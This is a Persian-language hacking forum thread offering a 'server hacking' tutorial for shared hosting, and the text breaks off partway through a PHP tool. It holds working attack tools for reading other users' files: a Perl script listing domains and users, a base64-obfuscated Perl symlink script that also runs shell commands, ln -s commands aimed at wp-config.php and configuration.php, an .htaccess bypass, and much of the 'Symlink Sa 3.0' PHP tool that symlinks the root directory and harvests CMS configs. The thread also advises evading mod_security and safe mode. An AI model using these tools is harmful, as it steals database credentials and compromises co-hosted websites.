SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

:: تاپیک آموزش سرور هکینگ ::

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • :: تاپیک آموزش سرور هکینگ ::

    :: تاپیک آموزش سرور هکینگ ::

    در این تاپیک آموزش ها و روش های Symlink ، bypass و نحوه root شدن بر روی سرور قرار میگیرد .

    در اولین پست با نجوه سیمیلینک و خواندن کانفیگ و در نهایت دیفیس آشنا میشوید .


    دانلود آموزش های تصویری

    [align=LEFT][php]

    http://uploaderx.persiangig.com/iranhack-security-team/Server%20Hacking.zip

    [/php][/align]
    [align=center][/align]

  • #2
    RE: :: تاپیک آموزش سرور هکینگ ::

    اسکریپتی برای لیست کردن یوزر های سایت به همراه دامنه :

    [align=LEFT][php]


    #!/usr/bin/perl -I/usr/local/bandmin
    print "Content-type: text/html\n\n";
    print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">

    <head>
    <meta http-equiv="Content-Language" content="en-us" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Coded By Karar alShaMi</title>
    <title>WwW.IraQi-ViruS.NeT</title>
    <style type="text/css">
    .newStyle1 {
    background-color: #000000;
    font-family: "Tahoma", Courier, monospace;
    font-size: small;
    font-weight: bold;
    color: #FFFFFF;
    }
    .style1 {
    text-align: center;
    }
    </style>
    </head>

    <body background="" style="background-attachment: fixed">

    <p>Domains &amp; Users </p>
    <p>Bypass</p>
    <p>By <font color="#FF0000">Karar alShaMi </font> </p>
    <p> <font color="#00FF00">Dev By The Sword</font></p>
    <p> <font color="#FF0000">www.Hack-Book.com</font></p>
    <p> <font color="#FFFF00">
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=</font></p>';
    open (domains, '/etc/named.conf') or $err=1;
    @kr = <domains>;
    close domains;
    if ($err){
    print ('<p>&nbsp;</p><p>Couldn\'t Bypass it , Sorry</p>');
    die();
    }else{
    print '<p><font color="#FF0000">H3r3 !s 411 D0m4!ns &amp; Us3rs</font> </p>
    ';}
    foreach my $one (@kr)
    {
    if($one =~ m/.*?zone "(.*?)" {/){
    $filename= "/etc/valiases/".$1;
    $owner = getpwuid((stat($filename))[4]);
    print '<p>'.$1.' : <font color="#dfdfdf">'.$owner.'</font></p>
    ';
    }
    }
    print'</body></html>';

    [/php]


    [align=RIGHT]اسکریپتی برای لیست کردن کانفیگ های روی یک سرور با ذکر نام یوزر بر روی نام کانفیگ برای شناسایی یوزر و دامنه :


    [align=LEFT][php]


    #!/usr/bin/perl -I/usr/local/bandmin
    use
    MIME::Base64;
    eval(decode_base64('IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci 9sb2NhbC9iYW5kbWluCnByaW50ICJDb250ZW50LXR5cGU6
    IHRleHQvaHRtbFxuXG4iOwpwcmludCc8IURPQ1RZUEUgaHRtbC BQVUJMSUMgIi0vL1czQy8vRFRE
    IFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3 d3dy53My5vcmcvVFIveGh0bWwx
    L0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+CjxodG1sIH htbG5zPSJodHRwOi8vd3d3Lncz
    Lm9yZy8xOTk5L3hodG1sIj4KPGhlYWQ+CjxtZXRhIGh0dHAtZX F1aXY9IkNvbnRlbnQtTGFuZ3Vh
    Z2UiIGNvbnRlbnQ9ImVuLXVzIiAvPgo8bWV0YSBodHRwLWVxdW l2PSJDb250ZW50LVR5cGUiIGNv
    bnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPH RpdGxlPlt+XSBBcmFiIEJsYWNr
    IEhhdDwvdGl0bGU+CjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+Ci 5uZXdTdHlsZTEgewogZm9udC1m
    YW1pbHk6IFRhaG9tYTsKIGZvbnQtc2l6ZTogeC1zbWFsbDsKIG ZvbnQtd2VpZ2h0OiBib2xkOwog
    Y29sb3I6ICMwMEZGRkY7CiAgdGV4dC1hbGlnbjogY2VudGVyOw p9Cjwvc3R5bGU+CjwvaGVhZD4K
    JzsKc3ViIGxpbHsKICAgICgkdXNlcikgPSBAXzsKJG1zciA9IH F4e3B3ZH07CiRrb2xhPSRtc3Iu
    Ii8iLiR1c2VyOwoka29sYT1+cy9cbi8vZzsKc3ltbGluaygnL2 hvbWUvJy4kdXNlci4nL3B1Ymxp
    Y19odG1sL3ZiL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLi cudHh0Jyk7CnN5bWxpbmsoJy9o
    b21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb2 5maWcucGhwJywka29sYS4nMS50
    eHQnKTsKc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY1 9odG1sL2NvbmZpZy5waHAnLCRr
    b2xhLicyLnR4dCcpOwpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLi cvcHVibGljX2h0bWwvZm9ydW0v
    aW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJzMudHh0Jyk7Cn N5bWxpbmsoJy9ob21lLycuJHVz
    ZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbG EuJzUudHh0Jyk7CnN5bWxpbmso
    Jy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb2 5maWcucGhwJywka29sYS4nNC50
    eHQnKTsKc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY1 9odG1sL3dwLWNvbmZpZy5waHAn
    LCRrb2xhLicxMy50eHQnKTsKc3ltbGluaygnL2hvbWUvJy4kdX Nlci4nL3B1YmxpY19odG1sL2Js
    b2cvd3AtY29uZmlnLnBocCcsJGtvbGEuJzE0LnR4dCcpOwpzeW 1saW5rKCcvaG9tZS8nLiR1c2Vy
    LicvcHVibGljX2h0bWwvY29uZl9nbG9iYWwucGhwJywka29sYS 4nNi50eHQnKTsKc3ltbGluaygn
    L2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvZG IucGhwJywka29sYS4nNy50eHQn
    KTsKc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG 1sL2Nvbm5lY3QucGhwJywka29s
    YS4nOC50eHQnKTsKc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3 B1YmxpY19odG1sL21rX2NvbmYu
    cGhwJywka29sYS4nOS50eHQnKTsKc3ltbGluaygnL2hvbWUvJy 4kdXNlci4nL3B1YmxpY19odG1s
    L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nMTAudHh0Jyk7Cn N5bWxpbmsoJy9ob21lLycuJHVz
    ZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2NvbmZpZy5waHAnLC Rrb2xhLicxMi50eHQnKTsKc3lt
    bGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2pvb2 1sYS9jb25maWd1cmF0aW9uLnBo
    cCcsJGtvbGEuJzExLnR4dCcpOwpzeW1saW5rKCcvaG9tZS8nLi R1c2VyLicvcHVibGljX2h0bWwv
    d2htL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nMTUudHh0Jy k7CnN5bWxpbmsoJy9ob21lLycu
    JHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb2 4ucGhwJywka29sYS4nMTYudHh0
    Jyk7CnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaH RtbC9zdXBwb3J0L2NvbmZpZ3Vy
    YXRpb24ucGhwJywka29sYS4nMTcudHh0Jyk7Cn0KaWYgKCRFTl Z7J1JFUVVFU1RfTUVUSE9EJ30g
    ZXEgJ1BPU1QnKSB7CiAgcmVhZChTVERJTiwgJGJ1ZmZlciwgJE VOVnsnQ09OVEVOVF9MRU5HVEgn
    fSk7Cn0gZWxzZSB7CiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1 NUUklORyd9Owp9CkBwYWlycyA9
    IHNwbGl0KC8mLywgJGJ1ZmZlcik7CmZvcmVhY2ggJHBhaXIgKE BwYWlycykgewogICgkbmFtZSwg
    JHZhbHVlKSA9IHNwbGl0KC89LywgJHBhaXIpOwogICRuYW1lID 1+IHRyLysvIC87CiAgJG5hbWUg
    PX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIk MiLCBoZXgoJDEpKS9lZzsKICAk
    dmFsdWUgPX4gdHIvKy8gLzsKICAkdmFsdWUgPX4gcy8lKFthLW ZBLUYwLTldW2EtZkEtRjAtOV0p
    L3BhY2soIkMiLCBoZXgoJDEpKS9lZzsKICAkRk9STXskbmFtZX 0gPSAkdmFsdWU7Cn0KaWYgKCRG
    T1JNe3Bhc3N9IGVxICIiKXsKcHJpbnQgJwo8Ym9keSBjbGFzcz 0ibmV3U3R5bGUxIiBiZ2NvbG9y
    PSIjMDAwMDAwIj4KPHA+QXJhYiBCbGFjayBIYXQgQ29uZmlnIE Z1Y2sgU2NyaXB0PC9wPgo8cD48
    Zm9udCBjb2xvcj0iI0MwQzBDMCI+WzwvZm9udD4gQ29kZWQgQn kgS2FyYXIgYUxTaGFNaSA8Zm9u
    dCBjb2xvcj0iI0MwQzBDMCI+fDwvZm9udD4gCkRldmVsb3BlZC BCeSBWaVJ1U19CYUdoRGFEPHNw
    YW4gaWQ9InJlc3VsdF9ib3giIGNsYXNzPSJzaG9ydF90ZXh0Ii BsYW5nPSJlbiI+PHNwYW4gc3R5
    bGUgdGl0bGU+Cjxmb250IGNvbG9yPSIjQzBDMEMwIj58PC9mb2 50Pjwvc3Bhbj48L3NwYW4+IDxh
    IGhyZWY9Imh0dHA6Ly93d3cuYXJhYi1ibGFja2hhdC5jYyI+Cj xzcGFuIHN0eWxlPSJ0ZXh0LWRl
    Y29yYXRpb246IG5vbmUiPjxmb250IGNvbG9yPSIjMDBGRjAwIj 53d3cuQXJhYi1CbGFja2hhdC5j
    YzwvZm9udD48L3NwYW4+PC9hPiAKPGZvbnQgY29sb3I9IiNDME MwQzAiPl08L2ZvbnQ+PC9wPgo8
    Zm9ybSBtZXRob2Q9InBvc3QiPgo8dGV4dGFyZWEgbmFtZT0icG FzcyIgc3R5bGU9ImJvcmRlcjox
    cHggZG90dGVkICMwMEZGRkY7IHdpZHRoOiA1NDNweDsgaGVpZ2 h0OiA0MjBweDsgYmFja2dyb3Vu
    ZC1jb2xvcjojMEMwQzBDOyBmb250LWZhbWlseTpUYWhvbWE7IG ZvbnQtc2l6ZTo4cHQ7IGNvbG9y
    OiMwMEZGRkYiICA+PC90ZXh0YXJlYT48YnIgLz4KJm5ic3A7PH A+CjxpbnB1dCBuYW1lPSJ0YXIi
    IHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZC AjMDBGRkZGOyB3aWR0aDogMjEy
    cHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW 1pbHk6VGFob21hOyBmb250LXNp
    emU6OHB0OyBjb2xvcjojMDBGRkZGOyAiICAvPjxiciAvPgombm JzcDs8L3A+CjxwPgo8aW5wdXQg
    bmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2 V0IENvbmZpZyIgc3R5bGU9ImJv
    cmRlcjoxcHggZG90dGVkICMwMEZGRkY7IHdpZHRoOiA5OTsgZm 9udC1mYW1pbHk6VGFob21hOyBm
    b250LXNpemU6MTBwdDsgY29sb3I6IzAwRkZGRjsgdGV4dC10cm Fuc2Zvcm06dXBwZXJjYXNlOyBo
    ZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz 48L3A+CjwvZm9ybT4nOwp9ZWxz
    ZXsKQGxpbmVzID08JEZPUk17cGFzc30+OwokeSA9IEBsaW5lcz sKb3BlbiAoTVlGSUxFLCAiPnRh
    ci50bXAiKTsKcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1 JNe3Rhcn0uIi50YXIgIjsKZm9y
    ICgka2E9MDska2E8JHk7JGthKyspewp3aGlsZShAbGluZXNbJG thXSAgPX4gbS8oLio/KTp4Oi9n
    KXsKJmxpbCgkMSk7CnByaW50IE1ZRklMRSAkMS4iLnR4dCAiOw pmb3IoJGtkPTE7JGtkPDE4OyRr
    ZCsrKXsKcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOwp9Cn 0KIH0KcHJpbnQnPGJvZHkgY2xh
    c3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+CjxwPk RvbmUgISE8L3A+CjxwPiZuYnNw
    OzwvcD4nOwppZigkRk9STXt0YXJ9IG5lICIiKXsKb3BlbihJTk ZPLCAidGFyLnRtcCIpOwpAbGlu
    ZXMgPTxJTkZPPiA7CmNsb3NlKElORk8pOwpzeXN0ZW0oQGxpbm VzKTsKcHJpbnQnPHA+PGEgaHJl
    Zj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIz AwRkYwMCI+CjxzcGFuIHN0eWxl
    PSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiPkNsaWNrIEhlcmUgVG 8gRG93bmxvYWQgVGFyIEZpbGU8
    L3NwYW4+PC9mb250PjwvYT48L3A+JzsKfQp9CiBwcmludCIKPC 9ib2R5Pgo8L2h0bWw+IjsK'));


    [/php][/align][/align][/align]
    [align=center][/align]

    نظر


    • #3
      RE: :: تاپیک آموزش سرور هکینگ ::

      معمولا در جهت بالا بردن سطوح امنیتی سرور یه سری عملگر ها رو غیرفعال میکنند و باعث میشه که هکر نتونه شل خودشو ران کنه و یا مجوز ران کردن بعضی اسکریپتها رو نداشته باشه شما در قدم اول پس از نفوذ باید برای دسترسی به کل سرور این ضرایب امنیتی را دور بزنید که با استفاده از روش های bypass
      حالت های
      Safe mod
      Mod Security
      Disabled function
      و ....

      میتوانید این عمل را انجام دهید بعضی مواقع پریم فایل های اصلی روت رو محدود میکنن که برای آنها هم روش bypass وجود دارد من انجمن زیر را پیشنهاد میکنم همچنین دوستان در سایت کلیپ های از روش های مختلف bypass سرور قرار دادند که با کمی جستجو موفق میشوید پیدا کنید .

      http://iranhack.com/acc/forum-33.html
      [align=center][/align]

      نظر


      • #4
        دستورات پر کاربرد برای سیمیلنک (سرور هکینگ)

        دستورات پر کاربرد برای symlink (سرور هکینگ)

        شناسایی یوزر با استفاده از دامنه :

        [align=LEFT]
        کد:
        ls -la /etc/vdomainaliases/sitename.com
        [align=RIGHT]بدون www و http

        خواندن فایل passwd یوزر ها :

        [align=LEFT]
        کد:
        cat /etc/passwd
        [align=RIGHT]کپی کردن کانفیگ یک یوزر :

        [align=LEFT]
        کد:
        ln -s /home/[user]/public_html/config.php  irh.txt
        
        wp : 
        ln -s /home/[user]/public_html/wp-config.php   irh.txt
        
        joomla :
        
        ln -s /home/[user]/public_html/configuration.php  irh.txt
        [/align][align=RIGHT]خواندن کانفیگ وقتی کپی کردید در همان مسیر به این صورت :

        [align=LEFT]
        کد:
        sitename.com/irh.txt

        [/align][/align][/align][/align][/align][/align]
        [align=center][/align]

        نظر


        • #5
          RE: :: تاپیک آموزش سرور هکینگ ::

          راهی نیست بهمیم که سایت از چی استفاده میکنه که بتونیم به کانفیگش سیم بزنیم
          مثلان سایت از ووردپرس استفاده میکنه و باید wp-config رو سیم بزنیم

          نظر


          • #6
            RE: :: تاپیک آموزش سرور هکینگ ::

            نوشته اصلی توسط adonis27
            راهی نیست بهمیم که سایت از چی استفاده میکنه که بتونیم به کانفیگش سیم بزنیم
            مثلان سایت از ووردپرس استفاده میکنه و باید wp-config رو سیم بزنیم
            می تونید از این قسمت اسفاده کنید :

            [align=LEFT]
            کد:
            Right CliCk > Page Info
            [align=RIGHT]یا تست سایت خاصی که مورد نظرتونه به صورت دستی و یا استفاده از شل b374k که این قابلیت رو برای اسکن داره

            موفق باشید[/align][/align]
            [align=CENTER][/align]

            نظر


            • #7
              RE: :: تاپیک آموزش سرور هکینگ ::

              کجای شل نوشته؟

              نظر


              • #8
                RE: :: تاپیک آموزش سرور هکینگ ::

                نوشته اصلی توسط adonis27
                راهی نیست بهمیم که سایت از چی استفاده میکنه که بتونیم به کانفیگش سیم بزنیم
                مثلان سایت از ووردپرس استفاده میکنه و باید wp-config رو سیم بزنیم
                دوستان زمانی که نمی دونین CMS سایت مورد نظر چیست !!! میتوانید کل فولدر آن یوزر را سیملینک کنید و بین فایل های آن سایت دنبال فایل config.php باشید
                [align=CENTER]Blackhat security Blog [/align]

                نظر


                • #9
                  RE: :: تاپیک آموزش سرور هکینگ ::

                  اگه پرم خوندن نداسته باشیم و ارور 403 بده باید چیکار کنیم؟

                  نظر


                  • #10
                    RE: :: تاپیک آموزش سرور هکینگ ::

                    نوشته اصلی توسط adonis27
                    اگه پرم خوندن نداسته باشیم و ارور 403 بده باید چیکار کنیم؟
                    در بعضی مواقع این htaccess جواب میده !

                    [align=LEFT]
                    کد:
                    Options all
                    
                    DirectoryIndex Sux.html
                    
                    AddType text/plain .php
                    
                    AddHandler server-parsed .php
                    
                    AddType text/plain .html
                    [/align]

                    بقیه سوالات رو در پیام خصوصی و یا در یاهو بپرسید تا فروم شلوغ نشه

                    موفق باشید
                    [align=CENTER][/align]

                    نظر


                    • #11
                      RE: :: تاپیک آموزش سرور هکینگ ::

                      ارور 403 داد وقتی سیم میزنم و کانفیگو تو فایل تکیت میریزم میبینم که این -rw------- (600) پرم داده به تکست
                      اینو چیکار کنم؟
                      ------------------------------------------------------
                      ویرایش توسط ناظم :

                      دوست عزیز همون طور که گفته شد بقیه سوالات را در پیام خصوصی ، بخش مخصوص سوالات و یا از طریق یاهو مسنجر مطرح کنید

                      از این پست دیدن کنید : http://iranhack.com/acc/thread-642.html

                      در صورت تکرار اخطار دریافت می کنید

                      موفق باشید :8:

                      نظر


                      • #12
                        RE: :: تاپیک آموزش سرور هکینگ ::

                        نوشته اصلی توسط adonis27
                        ارور 403 داد وقتی سیم میزنم و کانفیگو تو فایل تکیت میریزم میبینم که این -rw------- (600) پرم داده به تکست
                        اینو چیکار کنم؟
                        ------------------------------------------------------
                        ویرایش توسط ناظم :

                        دوست عزیز همون طور که گفته شد بقیه سوالات را در پیام خصوصی ، بخش مخصوص سوالات و یا از طریق یاهو مسنجر مطرح کنید

                        از این پست دیدن کنید : http://iranhack.com/acc/thread-642.html

                        در صورت تکرار اخطار دریافت می کنید

                        موفق باشید :8:

                        پرم کافی رو نداری برای دیدن محتویاتش یابد بایپس شه

                        نظر


                        • #13
                          RE: :: تاپیک آموزش سرور هکینگ ::

                          در بعضی مواقع شل نمیتونه فایل Named.conf رو بخونه و بنابراین شناسایی دامنه با یوزر کمی ما رو دچار مشکل میکنه اما یه راه حل وجود داره برای سرور هایی که فایل named.conf رو به هر صورتی سطح دسترسی اونو محدود کردند .

                          اگر دستور etc/passwd ما فعال باشه میتونید از اسکریپت زیر برای سیمیلینک از طریق یوزر ها استفاده کنید و توی فایل کانفیگ و یا setting در قسمت تنظیم کش میتونید آدرس سایت رو هم پیدا کنید .

                          [align=left]
                          کد:
                          <?php
                           
                           
                          /*
                           
                            .d8888. d88888b  .o88b.         db   d8b   db      .o88b.  .d88b.  .88b  d88.
                            88'  YP 88'     d8P  Y8         88   I8I   88     d8P  Y8 .8P  Y8. 88'YbdP`88
                            `8bo.   88ooooo 8P              88   I8I   88     8P      88    88 88  88  88
                              `Y8b. 88~~~~~ 8b      C8888D  Y8   I8I   88     8b      88    88 88  88  88
                            db   8D 88.     Y8b  d8         `8b d8'8b d8' db  Y8b  d8 `8b  d8' 88  88  88
                            `8888Y' Y88888P  `Y88P'          `8b8' `8d8'  VP   `Y88P'  `Y88P'  YP  YP  YP
                           
                           
                             author..............: s3n4t00r
                             home................: sec-w.com
                             twitter.............: @s3n4t00r
                             name tools..........: Symlink Sa v3.0
                           
                          */
                           
                           
                           
                          set_time_limit(0);
                          error_reporting(0);
                           
                           
                          $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
                          $u = explode("/",$pageURL );
                          $pageURL =str_replace($u[count($u)-1],"",$pageURL );
                           
                          $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
                          $u = explode("/",$pageFTP );
                          $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
                           
                          ?>
                            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
                              "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
                           
                          <html xmlns="http://www.w3.org/1999/xhtml">
                           
                          <head>
                          <title>Symlink_Sa 3.0</title>
                           
                          <style type="text/css">
                           
                            html,body {
                               margin: 0;
                               padding: 0;
                               outline: 0;
                          }
                          a{
                           
                           font-size: 13px;
                           
                          }
                           
                           
                          body {
                              direction: ltr;
                              background-color:#F4F4F4;
                              color: rgb(153, 153, 153);
                              text-align: center
                          }
                           
                           
                           
                          input,textarea,select{
                          font-weight: bold;
                          color: #000000;
                          }
                           
                          input,textarea,select:hover{
                          box-shadow: 0px 0px 4px #AAAAAA;
                          }
                           
                           
                          .hedr {
                            font-family: Tahoma, Arial, sans-serif  ;
                            font-size: 22px;
                           
                           
                          }
                           
                          .cont a{
                           
                           text-decoration: none;
                           color:rgb(153, 153, 153);
                           font-family: Tahoma, Arial, sans-serif  ;
                           font-size: 16px;
                           text-shadow: 0px 0px 3px ;
                          }
                           
                          .cont a:hover{
                           
                           
                            color: #EEEEEE ;
                            text-shadow:0px 0px 3px #000000 ;
                           
                           
                          }
                           
                          .tmp tr td{
                           
                          border: solid 1px #BBBBBB;
                           
                          padding: 2px ;
                            font-size: 13px;
                          }
                           
                          .tmp tr td a {
                            text-decoration: none;
                           
                           
                           
                          }
                           
                          .foter{
                            font-size: 9pt;
                            color: #AAAAAA ;
                            text-align: center
                          }
                           
                          .tmp tr td:hover{
                           
                          box-shadow: 0px 0px 4px #888888;
                           
                          }
                          .fot{
                           
                          font-family:Tahoma, Arial, sans-serif;
                           
                            font-size: 11pt;
                          }
                          .for a : hover{
                           
                          text-shadow: 0px 0px 1px #3366FF;
                           
                          }
                           
                           
                          .ir {
                            color: #FF0000;
                          }
                           
                           
                           
                          </style>
                           
                          </head>
                           
                          <body>
                           
                          <div class='all'>
                           
                           
                          <?php
                           
                          @mkdir('sym',0777);
                          $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
                          $f =@fopen ('sym/.htaccess','w');
                          fwrite($f , $htcs);
                           
                           
                           
                          @symlink("/","sym/root");
                           
                          $pg = basename(__FILE__);
                           
                          echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;
                           
                          echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;
                           
                          echo '<div class="cont">
                           
                          [<a href="?"> Home </a>]
                           
                          [<a href="?sws=sym"> User & Domains & Symlink </a>]
                           
                          [<a href="?sws=sec"> Domains & Script </a>]
                           
                          [ <a href="?sws=file"> Symlink File </a>]
                           
                          [<a href="?sws=passwd"> Symlink Bypass </a>]
                           
                          <br /><br />
                           
                          [ <a href="?sws=read"> Bypass Read </a>]
                           
                          [ <a href="?sws=joomla"> Mass Joomla </a>]
                           
                          [ <a href="?sws=wp"> Mass WordPress </a>]
                           
                          [ <a href="?sws=vb"> Mass vBulletin </a>]
                           
                          [ <a href="?sws=help"> Help </a>]
                           
                          <br /><br /><br />
                           
                           
                           
                           
                           
                           
                          </div>';
                           
                          if(isset($_REQUEST['sws']))
                          {
                           
                          switch ($_REQUEST['sws'])
                          {
                           
                           
                           
                           
                           
                          /// Domains + Scripts  ///
                           
                          case 'sec':
                           
                          if(!@is_file('named.txt')){
                           
                          $d00m = @file("/etc/named.conf");
                           
                          }else{
                           
                          $d00m = @file("named.txt");
                           
                           
                          }
                          if(!$d00m)
                          {
                           
                                          die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
                          }
                          else
                           
                          {
                          echo "<div class='tmp'>
                          <table align='center' width='40%'><td> Domains </td><td> Script </td>";
                          foreach($d00m as $dom){
                           
                          flush();
                          flush();
                           
                           
                           
                          if(eregi("zone",$dom)){
                           
                          @preg_match_all('#zone "(.*)"#', $dom, $domsws);
                           
                          flush();
                           
                          if(@strlen(trim($domsws[1][0])) > 2){
                           
                          $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
                           
                          ///////////////////////////////////////////////////////////////////////////////////
                           
                          $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
                          $wpp=@get_headers($wpl);
                          $wp=$wpp[0];
                           
                          $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
                          $wpp2=@get_headers($wp2);
                          $wp12=$wpp2[0];
                           
                          ///////////////////////////////
                           
                          $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
                          $joo=@get_headers($jo1);
                          $jo=$joo[0];
                           
                           
                          $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
                          $joo2=@get_headers($jo2);
                          $jo12=$joo2[0];
                           
                          ////////////////////////////////
                           
                          $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
                          $vbb=@get_headers($vb1);
                          $vb=$vbb[0];
                           
                          $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
                          $vbb2=@get_headers($vb2);
                          $vb12=$vbb2[0];
                           
                          $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
                          $vbb3=@get_headers($vb3);
                          $vb13=$vbb3[0];
                           
                          /////////////////
                           
                          $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
                          $whh2= @get_headers($wh1);
                          $wh=$whh2[0];
                           
                          $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
                          $whh2= @get_headers($wh2);
                          $wh12=$whh2[0];
                           
                          $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
                          $whh3= @get_headers($wh3);
                          $wh13=$whh3[0];
                           
                          $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
                          $whh5= @get_headers($wh5);
                          $wh15=$whh5[0];
                           
                          $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
                          $whh4= @get_headers($wh4);
                          $wh14=$whh4[0];
                           
                           
                           
                          ////////////////////////////////////////////////////////////////////////////////
                           
                           ////////// Wordpress ////////////
                           
                          $pos = strpos($wp, "200");
                          $config="&nbsp;";
                           
                          if (strpos($wp, "200") == true )
                          {
                           $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
                          }
                          elseif (strpos($wp12, "200") == true)
                          {
                            $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
                          }
                           
                          ///////////WHMCS////////
                           
                          elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
                          {
                            $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
                           
                          }
                          elseif (strpos($wh12, "200")  == true)
                          {
                            $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
                          }
                           
                          elseif (strpos($wh13, "200")  == true)
                          {
                            $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
                           
                          }
                           
                          ///////// Joomla to 4 ///////////
                           
                          elseif (strpos($jo, "200")  == true)
                          {
                            $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
                          }
                           
                          elseif (strpos($jo12, "200")  == true)
                          {
                            $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
                          }
                           
                          //////////vBulletin to 4 ///////////
                           
                          elseif (strpos($vb, "200")  == true)
                          {
                            $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
                          }
                           
                          elseif (strpos($vb12, "200")  == true)
                          {
                            $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
                          }
                           
                          elseif (strpos($vb13, "200")  == true)
                          {
                            $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
                          }
                           
                          else
                          {
                           continue;
                          }
                          flush();
                          flush();
                           
                          /////////////////////////////////////////////////////////////////////////////////////
                           
                           
                           
                          $site = $user['name'] ;
                           
                           
                           
                          flush();
                           
                          echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
                          <td>".$config."</td></tr>"; flush();
                           
                          }
                          }
                          }
                          }
                           
                           
                           
                           
                          break;
                           
                           
                          /// user + domine + symlink  ///
                           
                          case 'sym':
                           
                          if(!is_file('named.txt')){
                           
                          $d00m = @file("/etc/named.conf");
                           
                          }else{
                           
                          $d00m = @file("named.txt");
                           
                           
                          }
                          if(!$d00m)
                          {
                           
                                          die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
                          }
                          else
                           
                          {
                          echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
                          foreach($d00m as $dom){
                           
                          if(eregi("zone",$dom)){
                           
                          preg_match_all('#zone "(.*)"#', $dom, $domsws);
                           
                          flush();
                           
                          if(strlen(trim($domsws[1][0])) > 2){
                           
